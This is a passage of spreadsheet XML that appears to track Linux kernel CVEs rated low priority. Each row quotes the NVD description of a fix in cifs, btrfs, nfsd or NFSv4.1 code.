The file is created S_IRUSR (root-only) and a crafted device is needed,
so it is neither unprivileged- nor remotely-triggerable.
Clamp the copy length to resp-&gt;raw_size - 3 (the payload actually
received, minus the 3-byte header), floored at 0 for short replies.</t>
        </is>
      </c>
      <c r="S1039" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89628</t>
        </is>
      </c>
    </row>
    <row r="1040">
      <c r="A1040" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1040" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1040" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89629</t>
        </is>
      </c>
      <c r="D1040" s="5" t="inlineStr"/>
      <c r="E1040" s="5" t="inlineStr"/>
      <c r="F1040" s="5" t="inlineStr"/>
      <c r="G1040" s="5" t="inlineStr"/>
      <c r="H1040" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1040" s="5" t="inlineStr"/>
      <c r="J1040" s="5" t="inlineStr"/>
      <c r="K1040" s="5" t="inlineStr"/>
      <c r="L1040" s="5" t="inlineStr"/>
      <c r="M1040" s="5" t="inlineStr"/>
      <c r="N1040" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1040" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1040" s="5" t="inlineStr"/>
      <c r="Q1040" s="5" t="inlineStr"/>
      <c r="R1040" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: corsair-void: Check size of status and firmware events before reading them
Malformed status and firmware events could cause an out-of-bounds read since
the size wasn't being checked. Check the size and warn on unexpected values to
avoid this.</t>
        </is>
      </c>
      <c r="S1040" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89629</t>
        </is>
      </c>
    </row>
    <row r="1041">
      <c r="A1041" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1041" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1041" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89642</t>
        </is>
      </c>
      <c r="D1041" s="5" t="inlineStr"/>
      <c r="E1041" s="5" t="inlineStr"/>
      <c r="F1041" s="5" t="inlineStr"/>
      <c r="G1041" s="5" t="inlineStr"/>
      <c r="H1041" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1041" s="5" t="inlineStr"/>
      <c r="J1041" s="5" t="inlineStr"/>
      <c r="K1041" s="5" t="inlineStr"/>
      <c r="L1041" s="5" t="inlineStr"/>
      <c r="M1041" s="5" t="inlineStr"/>
      <c r="N1041" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1041" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1041" s="5" t="inlineStr"/>
      <c r="Q1041" s="5" t="inlineStr"/>
      <c r="R1041" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cifs: call pagecache_isize_extended() in cifs_setsize() when extending
cifs_setsize() calls truncate_pagecache() but skips
pagecache_isize_extended() on extension.  truncate_setsize() shows
the correct pattern:
  i_size_write(inode, newsize);
  if (newsize &gt; oldsize)
      pagecache_isize_extended(inode, oldsize, newsize);
  truncate_pagecache(inode, newsize);
pagecache_isize_extended() zeroes the tail of the page straddling old
EOF.  Without it, dirty bytes in that region can be written back to
the server, exposing stale data in the newly extended range.</t>
        </is>
      </c>
      <c r="S1041" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89642</t>
        </is>
      </c>
    </row>
    <row r="1042">
      <c r="A1042" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1042" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1042" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89644</t>
        </is>
      </c>
      <c r="D1042" s="5" t="inlineStr"/>
      <c r="E1042" s="5" t="inlineStr"/>
      <c r="F1042" s="5" t="inlineStr"/>
      <c r="G1042" s="5" t="inlineStr"/>
      <c r="H1042" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1042" s="5" t="inlineStr"/>
      <c r="J1042" s="5" t="inlineStr"/>
      <c r="K1042" s="5" t="inlineStr"/>
      <c r="L1042" s="5" t="inlineStr"/>
      <c r="M1042" s="5" t="inlineStr"/>
      <c r="N1042" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1042" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1042" s="5" t="inlineStr"/>
      <c r="Q1042" s="5" t="inlineStr"/>
      <c r="R1042" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: fix extent map leak in NOCOW direct I/O write
btrfs_dio_iomap_begin() calls btrfs_get_extent(), which returns an
extent map reference that must be dropped on all exit paths.
For direct writes into a NOCOW range, btrfs_get_blocks_direct_write()
keeps using that extent map and asks btrfs_create_dio_extent() to
allocate the ordered extent. If that fails, for example because
btrfs_alloc_ordered_extent() fails, the function returns the error
without dropping the input extent map. The PREALLOC path avoided this by
dropping the input extent map before replacing it with the newly created
one.
Check the error from btrfs_create_dio_extent() before replacing the
map and drop the input extent map on failure.</t>
        </is>
      </c>
      <c r="S1042" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89644</t>
        </is>
      </c>
    </row>
    <row r="1043">
      <c r="A1043" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1043" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1043" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89645</t>
        </is>
      </c>
      <c r="D1043" s="5" t="inlineStr"/>
      <c r="E1043" s="5" t="inlineStr"/>
      <c r="F1043" s="5" t="inlineStr"/>
      <c r="G1043" s="5" t="inlineStr"/>
      <c r="H1043" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1043" s="5" t="inlineStr"/>
      <c r="J1043" s="5" t="inlineStr"/>
      <c r="K1043" s="5" t="inlineStr"/>
      <c r="L1043" s="5" t="inlineStr"/>
      <c r="M1043" s="5" t="inlineStr"/>
      <c r="N1043" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1043" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1043" s="5" t="inlineStr"/>
      <c r="Q1043" s="5" t="inlineStr"/>
      <c r="R1043" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: drop recovered reloc root refs on recovery failure
During relocation recovery, each fs root gets a reference to its relocation
root. If loading or adding a later root fails, or if the first transaction
commit fails, btrfs_recover_relocation() jumps to out_unset before
merge_reloc_roots() and clean_dirty_subvols().
put_reloc_control() drops the list-owned relocation root references, but it
does not clear fs_root-&gt;reloc_root or drop the references owned by those
pointers. Mount cleanup only drops them when BTRFS_FS_ERROR is set, so an
error such as -ENOMEM while processing a later root can leave references
behind.
Keep temporary references to the fs roots associated during recovery. On
failure, clear their reloc_root pointers and drop the corresponding
references. Once the first transaction commit succeeds, drop only the
temporary fs root references and let the normal merge and cleanup paths
handle the relocation roots.
Fault injection on a pending-relocation image confirmed the cleanup gap.
With an injected first-commit failure, 25 fs roots had reloc_root set with
fs_error=0. With this fix, the same failure path drops that count to 0
before mount fails.</t>
        </is>
      </c>
      <c r="S1043" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89645</t>
        </is>
      </c>
    </row>
    <row r="1044">
      <c r="A1044" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1044" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1044" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89661</t>
        </is>
      </c>
      <c r="D1044" s="5" t="inlineStr"/>
      <c r="E1044" s="5" t="inlineStr"/>
      <c r="F1044" s="5" t="inlineStr"/>
      <c r="G1044" s="5" t="inlineStr"/>
      <c r="H1044" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1044" s="5" t="inlineStr"/>
      <c r="J1044" s="5" t="inlineStr"/>
      <c r="K1044" s="5" t="inlineStr"/>
      <c r="L1044" s="5" t="inlineStr"/>
      <c r="M1044" s="5" t="inlineStr"/>
      <c r="N1044" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1044" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1044" s="5" t="inlineStr"/>
      <c r="Q1044" s="5" t="inlineStr"/>
      <c r="R1044" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: Prevent post-shutdown use-after-free in unlock_filesystem
Writing a filesystem path to /proc/fs/nfsd/unlock_filesystem runs
nfsd4_cancel_copy_by_sb() before nfsd_mutex is held and before the
handler confirms that nn-&gt;nfsd_serv is set. Once nfsd has shut down,
nfs4_state_destroy_net() has freed nn-&gt;conf_id_hashtbl but left the
pointer intact, so the cancel helper iterates freed slab memory as an
array of struct list_head and then dereferences a bogus nfs4_client
when it takes clp-&gt;async_lock. A local administrator holding
CAP_SYS_ADMIN can reach this use-after-free by stopping the server and
then writing to unlock_filesystem; KASAN reports a slab-use-after-free
read in nfsd4_cancel_copy_by_sb().
nfsd4_revoke_states() walks the same state tables and for that reason
already runs only under nfsd_mutex with nn-&gt;nfsd_serv confirmed
present. Move the async COPY cancel into that protected section so
every NFSv4 state-table walker on this path observes a running server.
Async copies exist only while the server runs, so gating the cancel on
nn-&gt;nfsd_serv loses nothing.</t>
        </is>
      </c>
      <c r="S1044" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89661</t>
        </is>
      </c>
    </row>
    <row r="1045">
      <c r="A1045" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1045" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1045" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89666</t>
        </is>
      </c>
      <c r="D1045" s="5" t="inlineStr"/>
      <c r="E1045" s="5" t="inlineStr"/>
      <c r="F1045" s="5" t="inlineStr"/>
      <c r="G1045" s="5" t="inlineStr"/>
      <c r="H1045" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1045" s="5" t="inlineStr"/>
      <c r="J1045" s="5" t="inlineStr"/>
      <c r="K1045" s="5" t="inlineStr"/>
      <c r="L1045" s="5" t="inlineStr"/>
      <c r="M1045" s="5" t="inlineStr"/>
      <c r="N1045" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1045" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1045" s="5" t="inlineStr"/>
      <c r="Q1045" s="5" t="inlineStr"/>
      <c r="R1045" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: reject out-of-range nseconds in NFSv3 SETATTR and create ops
A client can send an NFSv3 SETATTR, CREATE, MKDIR, SYMLINK or MKNOD
carrying an atime or mtime whose nseconds field is out of range. The
value is well-formed on the wire and decodes cleanly into a valid
uint32, but it is not a valid timespec64: tv_nsec must be less than
NSEC_PER_SEC.
Nothing in the setattr path clamps it. notify_change() runs the time
through timestamp_truncate(), which does not reduce tv_nsec below
NSEC_PER_SEC when the filesystem supports nanosecond granularity
(s_time_gran == 1), and the inode atime/mtime setters store it verbatim
(only ctime is normalized, via inode_set_ctime_to_ts()). The
un-normalized value then corrupts on-disk metadata: ext4's
ext4_encode_extra_time() shifts tv_nsec left by EXT4_EPOCH_BITS, which
overflows the 32-bit extra field and clobbers the seconds-epoch bits, so
the stored seconds (and thus the year) are wrong on read-back. XFS with
bigtime mis-stores the timestamp for the same reason.
Validate the client-supplied atime/mtime in the proc handlers and return
NFS3ERR_INVAL before anything is changed. RFC 1813 lists NFS3ERR_INVAL
for SETATTR and describes it as the error for a value the server 'can
not store ... in its own representation'; the client maps it to EINVAL.
Checking in the proc handlers, rather than in nfsd_setattr(), keeps the
rejection in front of object creation. The create operations create the
object before nfsd_create_setattr() runs, so a late failure would leave
the new object behind and turn a non-idempotent request into a namespace
change that reports failure. The check is therefore done up front, for
the create operations before the object is created.
tv_nsec is a long, so the comparison casts it to unsigned long (the same
width) rather than to u32, matching timespec64_valid(). A u32 cast would
truncate on 64-bit; the unsigned long cast also rejects a value that
became negative when an out-of-range u32 wire nseconds was assigned to a
32-bit long.
Only client-supplied times are checked: SET_TO_SERVER_TIME requests
carry no client value. The sattrguard3 ctime is deliberately left alone:
an out-of-range guard simply never matches the object's ctime and yields
NFS3ERR_NOT_SYNC via the existing guardtime comparison, which is the
protocol-correct outcome rather than rejecting the request.</t>
        </is>
      </c>
      <c r="S1045" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89666</t>
        </is>
      </c>
    </row>
    <row r="1046">
      <c r="A1046" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1046" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1046" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89673</t>
        </is>
      </c>
      <c r="D1046" s="5" t="inlineStr"/>
      <c r="E1046" s="5" t="inlineStr"/>
      <c r="F1046" s="5" t="inlineStr"/>
      <c r="G1046" s="5" t="inlineStr"/>
      <c r="H1046" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1046" s="5" t="inlineStr"/>
      <c r="J1046" s="5" t="inlineStr"/>
      <c r="K1046" s="5" t="inlineStr"/>
      <c r="L1046" s="5" t="inlineStr"/>
      <c r="M1046" s="5" t="inlineStr"/>
      <c r="N1046" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1046" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1046" s="5" t="inlineStr"/>
      <c r="Q1046" s="5" t="inlineStr"/>
      <c r="R1046" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix XDR padding calculation in ff_encode_getdeviceinfo
nfsd4_ff_encode_getdeviceinfo() computes the da_addr_body reservation
as 16 + netid_len + addr_len, but the subsequent xdr_encode_opaque()
calls emit 8 + round_up(netid_len, 4) + round_up(addr_len, 4) bytes.
The mismatch means the declared da_addr_body length exceeds the actual
encoded data by 2-8 bytes on every flexfile GETDEVICEINFO reply,
leaking stale reply-page content to the client and mis-aligning the
subsequent version list decode.
Use xdr_align_size() for each string length to match what
xdr_encode_opaque() actually writes.</t>
        </is>
      </c>
      <c r="S1046" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89673</t>
        </is>
      </c>
    </row>
    <row r="1047">
      <c r="A1047" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1047" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1047" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89683</t>
        </is>
      </c>
      <c r="D1047" s="5" t="inlineStr"/>
      <c r="E1047" s="5" t="inlineStr"/>
      <c r="F1047" s="5" t="inlineStr"/>
      <c r="G1047" s="5" t="inlineStr"/>
      <c r="H1047" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1047" s="5" t="inlineStr"/>
      <c r="J1047" s="5" t="inlineStr"/>
      <c r="K1047" s="5" t="inlineStr"/>
      <c r="L1047" s="5" t="inlineStr"/>
      <c r="M1047" s="5" t="inlineStr"/>
      <c r="N1047" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1047" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1047" s="5" t="inlineStr"/>
      <c r="Q1047" s="5" t="inlineStr"/>
      <c r="R1047" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix dentry ref leak on V4ROOT export filehandle lookup
nfsd_set_fh_dentry() leaks the dentry reference from
exportfs_decode_fh_raw() when the NFS3_FHSIZE or NFS_FHSIZE
switch cases detect NFSEXP_V4ROOT and goto out. The out: label
calls exp_put() but never dput(dentry), and fhp-&gt;fh_dentry was
never assigned so fh_put() cannot compensate.
A crafted NFSv3 filehandle targeting a V4ROOT export's fsid
triggers the leak on every request.</t>
        </is>
      </c>
      <c r="S1047" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89683</t>
        </is>
      </c>
    </row>
    <row r="1048">
      <c r="A1048" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1048" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1048" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89693</t>
        </is>
      </c>
      <c r="D1048" s="5" t="inlineStr"/>
      <c r="E1048" s="5" t="inlineStr"/>
      <c r="F1048" s="5" t="inlineStr"/>
      <c r="G1048" s="5" t="inlineStr"/>
      <c r="H1048" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1048" s="5" t="inlineStr"/>
      <c r="J1048" s="5" t="inlineStr"/>
      <c r="K1048" s="5" t="inlineStr"/>
      <c r="L1048" s="5" t="inlineStr"/>
      <c r="M1048" s="5" t="inlineStr"/>
      <c r="N1048" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1048" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1048" s="5" t="inlineStr"/>
      <c r="Q1048" s="5" t="inlineStr"/>
      <c r="R1048" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: check nfsd4_acl_to_attr() return value in nfsd4_create()
nfsd4_create() stores the return value of nfsd4_acl_to_attr() in
status, but the switch(create-&gt;cr_type) block unconditionally
overwrites it in every branch. ACL translation errors are silently
discarded, and the CREATE proceeds without the requested ACL.
Add an early exit check after nfsd4_acl_to_attr(), matching the
pattern already used in nfsd4_setattr().
[ cel: prefer NFS4ERR_BADTYPE over NFS4ERR_ATTRNOTSUPP ]</t>
        </is>
      </c>
      <c r="S1048" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89693</t>
        </is>
      </c>
    </row>
    <row r="1049">
      <c r="A1049" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1049" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1049" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89694</t>
        </is>
      </c>
      <c r="D1049" s="5" t="inlineStr"/>
      <c r="E1049" s="5" t="inlineStr"/>
      <c r="F1049" s="5" t="inlineStr"/>
      <c r="G1049" s="5" t="inlineStr"/>
      <c r="H1049" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1049" s="5" t="inlineStr"/>
      <c r="J1049" s="5" t="inlineStr"/>
      <c r="K1049" s="5" t="inlineStr"/>
      <c r="L1049" s="5" t="inlineStr"/>
      <c r="M1049" s="5" t="inlineStr"/>
      <c r="N1049" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1049" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1049" s="5" t="inlineStr"/>
      <c r="Q1049" s="5" t="inlineStr"/>
      <c r="R1049" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: check client ownership when cancelling a copy-notify stateid
On the OFFLOAD_CANCEL path (clp != NULL), manage_cpntf_state() freed the
target cpntf state without checking ownership. The lookup key
st-&gt;si_opaque.so_id is allocated cyclically (guessable) and the embedded
clientid is the fixed per-net nn-&gt;s2s_cp_cl_id, so any authenticated
NFSv4.2 client could cancel and free another client's copy-notify
stateid.
Compare the creating clientid recorded in state-&gt;cp_p_clid against the
requesting client's cl_clientid and return nfserr_bad_stateid on a
mismatch instead of freeing the entry.</t>
        </is>
      </c>
      <c r="S1049" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89694</t>
        </is>
      </c>
    </row>
    <row r="1050">
      <c r="A1050" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1050" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1050" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89698</t>
        </is>
      </c>
      <c r="D1050" s="5" t="inlineStr"/>
      <c r="E1050" s="5" t="inlineStr"/>
      <c r="F1050" s="5" t="inlineStr"/>
      <c r="G1050" s="5" t="inlineStr"/>
      <c r="H1050" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1050" s="5" t="inlineStr"/>
      <c r="J1050" s="5" t="inlineStr"/>
      <c r="K1050" s="5" t="inlineStr"/>
      <c r="L1050" s="5" t="inlineStr"/>
      <c r="M1050" s="5" t="inlineStr"/>
      <c r="N1050" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1050" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1050" s="5" t="inlineStr"/>
      <c r="Q1050" s="5" t="inlineStr"/>
      <c r="R1050" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: widen nfsd_genl_rqstp address fields to sockaddr_storage
struct nfsd_genl_rqstp declares rq_daddr and rq_saddr as plain
"struct sockaddr" (16 bytes). When an IPv6 NFS client is connected,
nfsd_genl_rpc_status_compose_msg() casts these fields to
"struct sockaddr_in6 *" (28 bytes) and reads sin6_addr at offset 8..24,
which extends 8 bytes past the end of the 16-byte sockaddr field into
the adjacent rq_flags member. The 16-byte nla_put_in6_addr then ships 8
bytes of truncated IPv6 address followed by 8 bytes of rq_flags to
userspace via the NFSD_A_RPC_STATUS_SADDR6/DADDR6 netlink attributes.
This is reachable by any unprivileged process in the network namespace
because NFSD_CMD_RPC_STATUS_GET uses GENL_CMD_CAP_DUMP without
GENL_ADMIN_PERM.
Fix by widening rq_daddr and rq_saddr to struct sockaddr_storage so the
IPv6 casts operate within bounds, copying sizeof(struct sockaddr_storage)
bytes in the memcpy calls so the full address is captured, and
zero-initializing the genl_rqstp stack variable to prevent leaking
uninitialized tail bytes through netlink.</t>
        </is>
      </c>
      <c r="S1050" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89698</t>
        </is>
      </c>
    </row>
    <row r="1051">
      <c r="A1051" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1051" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1051" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89700</t>
        </is>
      </c>
      <c r="D1051" s="5" t="inlineStr"/>
      <c r="E1051" s="5" t="inlineStr"/>
      <c r="F1051" s="5" t="inlineStr"/>
      <c r="G1051" s="5" t="inlineStr"/>
      <c r="H1051" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1051" s="5" t="inlineStr"/>
      <c r="J1051" s="5" t="inlineStr"/>
      <c r="K1051" s="5" t="inlineStr"/>
      <c r="L1051" s="5" t="inlineStr"/>
      <c r="M1051" s="5" t="inlineStr"/>
      <c r="N1051" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1051" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1051" s="5" t="inlineStr"/>
      <c r="Q1051" s="5" t="inlineStr"/>
      <c r="R1051" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: validate sockaddr length per family in listener_set
nfsd_sock_nl_policy declares NFSD_A_SOCK_ADDR as a bare NLA_BINARY
attribute with no minimum length. A CAP_NET_ADMIN caller can send a
16-byte NFSD_A_SOCK_ADDR with sa_family=AF_INET6, causing a 12-byte
OOB read across three consumers (rpc_cmp_addr_port, svc_find_listener,
kernel_bind).
nfsd_nl_listener_set_doit() also parsed and validated each listener
entry inline in two separate loops, interleaved with mutating the
running listener configuration. The validation was duplicated, used an
open-coded "nla_len &lt; sizeof(struct sockaddr)" check that was too short
for AF_INET6, and handled a malformed entry inconsistently depending on
which loop noticed it.
Add an nfsd_nl_validate_listeners() helper that walks the entire list
once and confirms each entry parses, carries both an address and a
transport name, and is long enough for its address family
(sizeof(struct sockaddr_in) for AF_INET, sizeof(struct sockaddr_in6)
for AF_INET6, -EAFNOSUPPORT otherwise). Call it before taking
nfsd_mutex or creating the serv, so a malformed request fails cleanly
with no side effects.
Since every entry is known valid by the time the two existing loops
run, drop the redundant presence and per-family length checks from
both, leaving only the nla_parse_nested() call needed to extract the
data.</t>
        </is>
      </c>
      <c r="S1051" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89700</t>
        </is>
      </c>
    </row>
    <row r="1052">
      <c r="A1052" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1052" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1052" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89701</t>
        </is>
      </c>
      <c r="D1052" s="5" t="inlineStr"/>
      <c r="E1052" s="5" t="inlineStr"/>
      <c r="F1052" s="5" t="inlineStr"/>
      <c r="G1052" s="5" t="inlineStr"/>
      <c r="H1052" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1052" s="5" t="inlineStr"/>
      <c r="J1052" s="5" t="inlineStr"/>
      <c r="K1052" s="5" t="inlineStr"/>
      <c r="L1052" s="5" t="inlineStr"/>
      <c r="M1052" s="5" t="inlineStr"/>
      <c r="N1052" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1052" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1052" s="5" t="inlineStr"/>
      <c r="Q1052" s="5" t="inlineStr"/>
      <c r="R1052" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: validate nseconds in TIME_DELEG decode paths
The xdrgen-based TIME_DELEG_ACCESS and TIME_DELEG_MODIFY decode arms
store a raw uint32_t nseconds directly into tv_nsec without enforcing
nseconds &lt; NSEC_PER_SEC. The legacy nfsd4_decode_nfstime4 has this
check but the TIME_DELEG paths do not. A malformed timespec can
propagate through notify_change() to disk.
Add range checks in both nfs4xdr.c (SETATTR path) and
nfs4callback.c (CB_GETATTR path).</t>
        </is>
      </c>
      <c r="S1052" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89701</t>
        </is>
      </c>
    </row>
    <row r="1053">
      <c r="A1053" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1053" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1053" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89710</t>
        </is>
      </c>
      <c r="D1053" s="5" t="inlineStr"/>
      <c r="E1053" s="5" t="inlineStr"/>
      <c r="F1053" s="5" t="inlineStr"/>
      <c r="G1053" s="5" t="inlineStr"/>
      <c r="H1053" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1053" s="5" t="inlineStr"/>
      <c r="J1053" s="5" t="inlineStr"/>
      <c r="K1053" s="5" t="inlineStr"/>
      <c r="L1053" s="5" t="inlineStr"/>
      <c r="M1053" s="5" t="inlineStr"/>
      <c r="N1053" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1053" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1053" s="5" t="inlineStr"/>
      <c r="Q1053" s="5" t="inlineStr"/>
      <c r="R1053" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSv4.1: fix layout segment leak on the pnfs_layout_process() forget path
When the server returns a new layout stateid while a valid one is still
held, pnfs_layout_process() calls pnfs_mark_matching_lsegs_return() on
the on-stack free_me list and jumps to out_forget. Segments whose
reference count drops to zero are unlinked from lo-&gt;plh_segs and moved
to free_me by mark_lseg_invalid(); for an idle cached segment the layout
header holds the only reference, so this happens on the first decrement.
out_forget never drains free_me -- only the success path calls
pnfs_free_lseg_list().
Commit 814b84971388 ("pNFS/NFSv4: Fix a layout segment leak in
pnfs_layout_process()") added the drain; commit 08bd8dbe8882
("pNFS/NFSv4: Try to return invalid layout in pnfs_layout_process()")
removed it while switching the destination to lo-&gt;plh_return_segs, which
is drained elsewhere. Commit fb700ef02676 ("NFSv4.1: Simplify layout
